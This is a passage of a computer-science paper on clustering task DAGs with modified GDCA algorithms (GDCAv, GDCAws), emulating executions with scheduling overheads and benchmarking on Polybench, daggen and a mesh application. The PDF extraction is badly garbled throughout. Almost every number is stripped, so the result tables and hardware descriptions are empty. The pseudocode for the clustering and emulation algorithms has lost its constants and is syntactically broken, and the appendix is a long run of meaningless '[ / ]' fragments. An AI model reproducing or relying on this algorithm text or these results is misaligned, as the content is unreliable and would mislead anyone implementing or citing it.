of the nodes. in figure , we provide an example of clustering that illustrates why we potentially need additional heuristics for the aggregate-selections. in fig. b both nodes x and z are ready and could be selected, but node z has no connections with the new cluster. the original algorithm does not have a mechanism to detect this situation. second, in fig. d since z has no connections with the new cluster, it could be disadvantageous to add it. if we imagine the case where a graph is composed of two independent parts, connecting them is like putting a synchronization on their progress. on the other hand, if we need clusters of a fixed size, as it is the case in the original algorithm, there is no choice and z must be put in the cluster. in appendix, we provide two graphs that were clustered using gdca, see figs. a and a . change in the initial-selection. we propose to select the node using the depth (like in the original algorithm), but also to use the number of predecessors. our objective is to privilege the nodes with the highest number of predecessors that we consider more critic. change in the aggregate-selection. to select the next node to add to a cluster, we choose the node with the highest number of predecessors in the cluster, but in case of equality, we compare the number of nodes in common between the successors of the cluster and the successors of the candidates. for instance, in fig. a, the node x has one common successor with the new cluster (node u), but as the number of predecessors in the cluster is more significant v is selected. then, in fig. b, x has one common successor, and z none, therefore, with this heuristic x is selected. bramas and ketterlin ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. flexible cluster size. if no nodes in the ready list have a predecessor in the cluster or a common successor, then we can decide to stop the construction of the current cluster and start a new one, which means that some clusters will have less than m nodes. this heuristic would stop the construction of the new cluster in fig. d. full algorithm. the complete solution is provided in algorithm . the gdca algorithm is annotated with our modifications and we dissociate gdcav that includes the change in the nodes selections, and gdcaws that includes the stop when no ready node has a connection with the new cluster. the main loop, line , ensures that the algorithm continues until there are no more ready nodes in the list. the initial-selection is done at line , where the algorithm compares the depth, the number of predecessors and the ids of each node. this can be implemented using a sort or simply by selecting the best candidate as the list will be rearranged and updated later in the algorithm. at line , the dependencies of the master node are released. if some of its predecessors become ready (line ), they are put in the list and their counters of predecessors in the new cluster are incremented. otherwise (line ), they are put in a set that includes all the successors of the new cluster. this set is used line , to count the common successors between the cluster and each ready node. in an optimized implementation, this could be done only if needed, i.e. if the best nodes have equal number of predecessors in the cluster during the aggregate-selection. at line , the ready nodes are sorted using their number of predecessors in the cluster, their number of common successors with the cluster and their ids. if we have flexible cluster size, we can stop the construction of the new cluster (line ) if we consider that no nodes are appropriate. otherwise, the next node is added to the cluster, its dependencies are released and the counter updated (from line to line ). in appendix, we provide an example of emulated execution of a dag using this method, see fig. a . emulating the execution of dag of tasks iterating on a dag to emulate an execution with a limited number of processing units is a classical algorithm. however, how the overhead should be defined and included in the model is still evolving (kestor, gioiosa & chavarra-miranda, ). we propose to take into account three different overheads: one overhead per task execution, and two overheads for the release and the selection of a ready task. using an overhead per task is classically admitted in the majority of models. in our case, this overhead is a constant per task - no matter the task’s size - and only impacts the worker that will execute the task. for example, if the overhead per task is ot and a worker starts the execution of a task of duration d at time t, the worker will become available at t+d+ot . the accumulated cost duration implied by this overhead decreases proportionally with the number of tasks (i.e., the more tasks per cluster the less total overhead). second, our model includes an overhead every time a task is released or assigned to a worker. when a task is released, it has to be pushed in the ready task list, and this implies either some synchronization or lock-free mechanisms with a non-negligible cost. the same happens when a task is popped from the list and assigned to a worker. moreover, the bramas and ketterlin ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. pushes and pops compete to modify the ready list, and in both cases, this can be seen as a lock with only one worker at a time that accesses it. as a result, in our model, we increment the global timestamp variable every time the list is modified. we provide our solution in algorithm , which is an extension of the dag execution algorithm with a priority queue of workers. the workers are stored in the queue based on their next availability and we traverse the graph while maintaining the dependencies and a list of ready tasks. at line , we initialize the current time variable using the number of ready tasks and the push overhead, considering that all these tasks are pushed in the list and this makes it impossible to access it. then, at line , we assign tasks to the available workers and store them in the priority queues using the cost of each task and the overhead per task, see line . then, in the core loop, line , we pick the next available worker, release the dependencies for the task it was computed, and assign tasks to idle workers (until there are no more tasks or idle workers). finally, we wait for the last workers to finish at line . our execution model is used to emulate the execution of a dag on a given architecture, but we also use it to found the best cluster granularity. to do so, we emulate executions starting with a size m = and we increase m and keep track of the best granularity found so far b. we stop after granularity ×b. the idea is that we will have a speedup as we increase the granularity until we constraint too much the degree of parallelism. but in order not to stop at the first local minima (the first time an increase of the granularity results in an increase of the execution time), we continue to test until the granularity equals two times the best granularity we have found. experimental study we evaluate our approach on emulated executions and on a real numerical application. emulated executions graph data-set. we use graphs of different properties that we summarize in table . they were generated from the polybench collection (grauer-gray et al., ), the daggen tool (suter, ) or by ourselves. the graphs from daggen are complex in the sense that their nodes have important number of predecessors/successors and that the cost of the tasks are significant and of large intervals. the graphs with names starting by chukrut are the test cases for the real application. bramas and ketterlin ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. algorithm : gdca algorithm, where m is the desired cluster size. gdcav includes the lines in black underlined-bold. gdca-ws includes the lines in gray. function cluster(g=(v ,e), m) ready←get_roots(g) // gets the roots depths←distance_from_roots(g, ready) // gets the distance from roots count_deps_release = ∅ // # of released dependencies cpt_cluster = while ready is not empty do count_pred_master = ∅ // # predecessors in the new cluster count_next_common = ∅ // # common successors // sort by, first increasing depths, second decreasing number // of predecessors, third increasing ids (to ensure a strict // order) ready.sort() master = ready.pop_front() clusters[master] = cpt_cluster master_boundary = ∅ for u∈ successors[master] do count_deps_release[u] += if count_deps_release[u] equal |predecessors[u]| then ready.insert(u) count_pred_master[u] = else master_boundary.insert(u) end end cluster_size = while cluster_size < m do for u∈ ready do count_next_common[u] = | successors[u]∩master_boundary | end // sort by, first decreasing count_pred_master, second // increasing depths, third decreasing count_next_common, // fourth increasing ids (to ensure a strict order) ready.sort() next = ready.front(); if count_pred_master[next] is and count_next_common[next] is then break; end ready.pop_front() cluster_size += clusters[next] = cpt_cluster for u∈ successors[next] do count_deps_release[u] += if count_deps_release[u] equal |predecessors[u]| then ready.insert(u) count_pred_master[u] = for v∈predecessors[u] do if clusters[v] == clusters[master] then count_pred_master[u] += end end master_boundary.erase(u) else master_boundary.insert(u) end end end cpt_cluster += end hardware. we consider four systems in total, two imaginary hardware with two type of overhead low (l) and high (h), with the following properties: bramas and ketterlin ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. algorithm : emulate an execution of g using w workers. the overheads are push_overhead, pop_overhead and task_overhead. function emulate_execution(g=(v ,e), w , push_overhead, pop_overhead, task_overhead) idle_worker← list( , w- ) current_time← ready←get_roots(g) current_time←push_overhead× ready.size() nb_computed_task← workers← empty_priority_queue() while ready is not empty and idle_worker is not empty do task← ready.pop() worker← idle_worker.pop() current_time← current_time + pop_overhead workers.enqueue(worker, task, current_time, costs[u] + task_overhead) nb_computed_task←nb_computed_task + end deps← while nb_computed_task = |tasks|do [task, worker, end]←workers.dequeue() current_time←max(current_time, end) idle_worker.push(worker) for v∈ successors[u] do deps[v]←deps[v] + if |deps[v]|= |predecessors[v]| then ready.push(v) end end while ready is not empty and idle_worker is not empty do task← ready.pop() worker← idle_worker.pop() current_time← current_time + pop_overhead workers.enqueue(worker, task, current_time, costs[u] + task_overhead) nb_computed_task←nb_computed_task + end end while nb_computed_task = |tasks|do [task, worker, end]←workers.dequeue() current_time←max(current_time, end) end return current_time • config- -l: system with threads and overhead per task . , per push . and per pop . . • config- -h: system with threads and overhead per task , per push and per pop . • config- -l: system with threads and overhead per task . , per push . and per pop . . • config- -h: system with threads and overhead per task , per push and per pop . the given overheads are expressed in terms of proportion of the total execution time of a graph. consequently, if d is the total duration of a graph (the sum of the duration of the n tasks), and if the overhead is ot , then the overhead per task is given by d×ot /n . increasing granularity. in figure , we show the duration of the emulated executions as the granularity increases for twelve of the graphs. as expected the execution time decreases as the granularity increases in most cases since the impact of the overhead is mitigated. using threads (config- -l/red line) instead of (config- -l/green line) does not speed up the execution when the overhead is low, and this is explained by the fact that the average degree of parallelism is lower than for most graphs. in figs. h and k, the bramas and ketterlin ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. execution time shows a significant variation depending on the clustering size. this means that for some cluster sizes several workers are not efficiently used by being idle (waiting for another a worker to finish its task and release the dependencies), while for some other sizes the workload per worker is well balanced and the execution more efficient. note that we increase the granularity up to two times the best granularity we have found, and this appears to be a good heuristic to catch the best cluster size without stopping at the first local minima. details. in table , we provide the best speedup we have obtained by taking execution times without clustering as reference. we provide the results for the gdca and the updated method (gdcav ), and also show the best granularity for each case. the gdcav provides a speedup over gdca in many cases. for instance, for the daggen’s graphs the gdcav method is faster in most cases. in addition, there are cases where the gdcav provide a significant speedup, such as the graphs polybench - kernel trmm, polybench - kernel jacobi d imper and polybench - kernel gemvr. for the config- -h configuration and the polybench - kernel gemvr graph, the gdca has a speedup of . , and gdcav . . however, there are still many cases where gdca is faster, which means that to cluster a graph from a specific application it is required to try and compare both methods. in addition, this demonstrates that while our modifications of gdca seem natural when we look at the graph at a low level, they do not necessarily provide an improvement at a global level due to corner cases. moreover, the ids of the nodes are more important in gdca than in gdcav , and this information is usually not random and includes the order of construction of the tasks. concerning gdcaws, the method is not competitive for most of the graphs. however, it provides a significant speedup for the chukrut graphs, which are the ones use in our real application. real application hardware configuration we use the following computing nodes: • intel- t : × intel(r) xeon(r) cpu e - v @ . ghz, with caches l k, l k and l k ( threads in total). • intel- t : × intel(r) xeon(r) gold cpu @ . ghz v , with caches l k, l k and l k ( threads in total). software configuration. we use the gnu c compiler . . . we parallelize using openmp threads and we do not use any mutex during the execution. we only use lock-free mechanisms implemented with c atomic variables to manage the dependencies and the list of ready tasks, which is actually an array updated using atomics. test cases. the two test cases represent a d mesh that has the shape of a disk with sizes and . the details of the two corresponding graphs are provided in table under the names chukrut - disque and chukrut - disque . the execution of a single task takes around . · − s. to estimate the overhead, we take the execution time in sequential t and the execution time using a third of the available threads tx and do bramas and ketterlin ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table details of the studied graphs. the degree of parallelism is obtained by iterating on the graph, while respecting the dependencies, and measure the size of the ready task list (the average size or the largest size found during the execution). name #vertices #edges #predecessors total cost cost degree of parallelism avg max min avg max avg max createdag - agraph- dgrid- . . createdag - agraph-deptree- . . createdag - agraph-doubletree- . . createdag - agraph-tree- . . chukrut - disque . . chukrut - disque . . daggen - - - - - . . e+ . e+ . e+ . e+ . daggen - - - - - . . e+ . e+ . e+ . e+ . daggen - - - - - . . e+ . e+ . e+ . e+ . daggen - - - - - . . e+ . e+ . e+ . e+ . daggen - - - - - . . e+ . e+ . e+ . e+ . polybench - kernel mm . . polybench - kernel mm . . polybench - kernel adi . . polybench - kernel atax . . polybench - kernel covariance . . polybench - kernel doitgen . polybench - kernel durbin . . polybench - kernel fdtd d . polybench - kernel gemm . polybench - kernel gemver . . polybench - kernel gesummv . . polybench - kernel jacobi d imper . polybench - kernel jacobi d imper . polybench - kernel lu . polybench - kernel ludcmp . . polybench - kernel mvt . polybench - kernel seidel d . . polybench - kernel symm . polybench - kernel syr k . polybench - kernel syrk . polybench - kernel trisolv . . polybench - kernel trmm . . b ram as and k etterlin ( ),p eerj c om put. s ci.,d o i . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. granularity te m ps (s ) disque .dot (a) granularity × × × te m ps (s ) generated-dag- - _ - _ - - _ .dot (b) granularity te m ps (s ) kernel_atax.dot (c) granularity × × × × te m ps (s ) kernel_durbin.dot (d) granularity te m ps (s ) kernel_trmm.dot (e) granularity te m ps (s ) kernel_seidel_ d.dot (f) granularity te m ps (s ) kernel_jacobi_ d_imper.dot (g) granularity te m ps (s ) kernel_gemver.dot (h) granularity t em ps (s ) agraph- dgrid- .dot (i) granularity te m ps (s ) kernel_covariance.dot (j) granularity te m ps (s ) kernel_fdtd_ d.dot (k) config / . / . / . config / . / . / . config / . / . / . config / . / . / . gdca gdcav (l) legend figure emulated execution times against cluster granularity g for different test cases, different ma- chine configurations (colors ----) and different strategies (nodes•n). (a) disque . (b) generated-dag- - . - . - - . . (c) kernel atax. (d) kernel durbin. (e) kernel trmm. (f) kernel seidel. (g) kernel ja- cobi d imper. (h) kernel gemver. (i) agraph dgrid- . (j) kernel covariance. (k) kernel fdtf d. full-size doi: . /peerjcs. /fig- o=(tx×x−t )/t . we obtained an overhead of on intel- t and of . on intel- t. we dispatch this overhead one half for the overhead per task, and one quarter for the push/pop overheads. the execution times are obtained from the average of executions. we increase the granularity up to m = in order to show if our best granularity selection heuristic would miss the best size. results. in fig. , we provide the results for the two test cases on the two computing nodes. bramas and ketterlin ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. table speedup obtained by clustering the graphs on emulated executions for gdca and gdcav . the best granularity for the different graphs is provided, and the speedup is in bold when one of the two clustering strategies appears more efficient than the other for a given hardware. gdcaws is slower in most cases, except for the graphs from createdag and chukrut. for the configuration config- -h, gdcaws get a speedup of for chukrut - disque and of for chukrut - disque . name config- -l config- -h config- -l config- -h gdca gdcav gdca gdcav gdca gdcav gdca gdcav g sp. g sp. g sp. g sp. g sp. g sp. g sp. g sp. createdag - agraph- dgrid- . . . . . . . . createdag - agraph-deptree- . . . . . . . . createdag - agraph-doubletree- . . . . . . . . createdag - agraph-tree- . . . . . . . . chukrut - disque . . . . . . . . chukrut - disque . . . . . . . . daggen - - - - - . . . . . . . . daggen - - - - - . . . . . . . . daggen - - - - - . . . . . . . . daggen - - - - - . . . . . . . . daggen - - - - - . . . . . . . . polybench - kernel mm . . . . . . . . polybench - kernel mm . . . . . . . . (continued on next page) b ram as and k etterlin ( ),p eerj c om put. s ci.,d o i . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table (continued) name config- -l config- -h config- -l config- -h gdca gdcav gdca gdcav gdca gdcav gdca gdcav g sp. g sp. g sp. g sp. g sp. g sp. g sp. g sp. polybench - kernel adi . . . . . . . . polybench - kernel atax . . . . . . . . polybench - kernel covariance . . . . . . . . polybench - kernel doitgen . . . . . . . . polybench - kernel durbin . . . . . . . . polybench - kernel fdtd d . . . . . . . . polybench - kernel gemver . . . . . . . . polybench - kernel gesummv . . . . . . . . polybench - kernel jacobi d imper . . . . . . . . polybench - kernel jacobi d imper . . . . . . . . polybench - kernel lu . . . . . . . . polybench - kernel ludcmp . . . . . . . . polybench - kernel mvt . . . . . . . . polybench - kernel seidel d . . . . . . . . polybench - kernel symm . . . . . . . . polybench - kernel syr k . . . . . . . . polybench - kernel syrk . . . . . . . . polybench - kernel trisolv . . . . . . . . polybench - kernel trmm . . . . . . . b ram as and k etterlin ( ),p eerj c om put. s ci.,d o i . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. gdca gdcaws gdcav emulation with overhead real execution (a) legend granularity (m) sp ee du p intel- t- s - size (b) granularity (m) sp ee du p intel- t- s - size (c) granularity (m) sp ee du p intel- t- s - size (d) granularity (m) sp ee du p intel- t- s - size (e) figure speedup obtained for the two test cases with different clustering strategies. we show the speedup obtained from emulated executions (dashed lines) and from the real executions (plain lines). (a) inter- t- s size . (b) inter- t- s size . (c) inter- t- s size . (d) inter- t- s size . full-size doi: . /peerjcs. /fig- in the four configurations, the emulation of gdcaws (blue dashed line) is too optimistic compared to the real execution (blue line): on intel- t, figs. b and c, gdcaws performed poorly (blue line), but on intel- t, figs. d and e, gdcaws is efficient for large granularities. however, even if it is efficient on average on intel- t, it never provides the best execution. this means that having a flexible cluster size is not the best approach for these graphs and that having fewer clusters but of a fixed size (even if it adds more dependencies) seems more appropriate. concerning the emulation, our model does not catch the impact of having clusters of different sizes. the emulation of gdca is more accurate (dashed green line) when we compare it with the real execution (green line), even if the real execution is always underperforming. however, the global shape is correct and, importantly, the performance peaks that happen bramas and ketterlin ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. in the emulation also happen in the real execution. this means that we can use emulated executions to find the best clustering size for the gdca. in terms of performance, gdca provides the best execution on the intel- t for m between and . the emulation of gdcav is accurate for the intel- t (figs. b and c) with a superimposition of the plots (dashed/plain purple lines). however, it is less accurate for the intel- t (figs. d and e) where the real execution is underperforming compared to the emulation. as for the gdca, the peaks of the emulation of the gdcav concord with the peaks of the real executions. gdcav provides the best performance on the intel- t, for m between and . gdca and gdcav have the same peaks; therefore, for some cluster sizes the degree of parallelism is much better and the filling of the workers more efficient. but gdcav is always better on the intel- t, while on the intel- t both are very similar except that gdca is faster at the peaks. while the difference is not necessarily significant this means that the choice between gdca and gdcav is machine-dependent. conclusion the management of the granularity is one of the main challenges to achieve high- performance using the tasks and dependencies paradigm. gdca allows controlling the granularity of the tasks by grouping them to obtain a macro-dag. in this paper, we have presented gdcav and gdcaws two modified version of gdca. we evaluated the benefit of gdca and gdcav on emulated executions. we have demonstrated that our modifications allow obtaining significant speedup in several cases but that it remains unknown which of the two methods will give the best results. we evaluated the three algorithms on a real application and we have demonstrated that clustering the dag allowed to get a speedup of compared to executions without clustering. we were able to find the best granularity using emulated execution based on a model that incorporates different overheads. as a perspective, we would like to plug our algorithm directly inside an existing task-based runtime system to cluster the dag on the fly during the execution. this would require a significant programming effort but will open the study of more applications and certainly lead to improving not only the selection of the parameters but also the estimation of the costs and the overheads. in addition, we would like to adapt the aggregate-selection during the clustering process in order to always use the best of gdca and gdcav . acknowledgements the experiments presented in this paper were carried out using the plafrim experimental testbed, supported by inria, cnrs (labri and imb), université de bordeaux, bordeaux inp and conseil régional d’aquitaine (see https://www.plafrim.fr/). appendix figures a and a are examples of graph clustering with our method. figure a shows an example of a graph clustering and an emulated execution. bramas and ketterlin ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://www.plafrim.fr/ http://dx.doi.org/ . /peerj-cs. [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] figure a clustering of a graph of nodes generated by propagation of the dependencies on a d grid from one corner to the opposite one. the cluster size is m = . there are clusters. full-size doi: . /peerjcs. /fig- bramas and ketterlin ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] 